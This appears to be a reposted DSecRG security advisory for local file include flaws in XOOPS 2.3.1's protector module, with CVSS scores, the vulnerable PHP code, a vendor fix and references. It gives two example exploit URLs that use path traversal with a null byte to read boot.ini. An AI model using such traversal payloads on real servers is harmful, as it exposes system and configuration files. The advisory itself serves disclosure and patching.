Multiple Local File Include Vulnerabilities in Xoops 2.3.x

2009-08-03 / 2009-08-04
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-040 Application: XOOPS Versions Affected: 2.3.1 Vendor URL: http://www.xoops.org/ Bug: Multiple Local File Include Exploits: YES Reported: 10.11.2008 Vendor response: 10.11.2008 Solution: YES Date of Public Advisory: 08.12.2008 Authors: Digital Security Research Group [DSecRG] (research[at] dsec [dot] ru) Description *********** XOOPS has Multiple Local File Include vulnerabilities. Details ******* Local File Include vulnerability found in scripts: xoops_lib/modules/protector/blocks.php xoops_lib/modules/protector/main.php Successful exploitation requires that "register_globals" is enabled. Code ---- ################################################# $mytrustdirname = basename( dirname( __FILE__ ) ) ; $mytrustdirpath = dirname( __FILE__ ) ; // language files $language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language']; if( file_exists( "$mydirpath/language/$language/main.php" ) ) { // user customized language file (already read by common.php) // include_once "$mydirpath/language/$language/main.php" ; } else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) { // default language file include_once "$mytrustdirpath/language/$language/main.php" ; ... ################################################# For successful exploitation first condition in if..else statement must be not true. Example: http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00 Solution ******** Vendor fixed this flaw on 26.11.2008. XOOPS 2.3.2a Security Release can be download from Sourceforge repository: https://sourceforge.net/project/showfiles.php?group_id=41586&package_id=153583&release_id=643010 Release notes: http://www.xoops.org/modules/news/article.php?storyid=4540 About ***** Digital Security is leading IT security company in Russia, providing informationsecurity consulting, audit and penetration testing services, risk analysis andISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.Digital Security Research Group focuses on web application and database securityproblems with vulnerability reports, advisories and whitepapers posted regularly onour website. Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian)

References:

http://xforce.iss.net/xforce/xfdb/47153
http://www.xoops.org/modules/news/article.php?storyid=4563
http://www.xoops.org/modules/news/article.php?storyid=4540
http://www.securityfocus.com/bid/32685
http://osvdb.org/50573
http://osvdb.org/50572
http://marc.info/?l=bugtraq&m=122875395329794&w=2
http://www.milw0rm.com/exploits/7380
http://secunia.com/advisories/33048


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top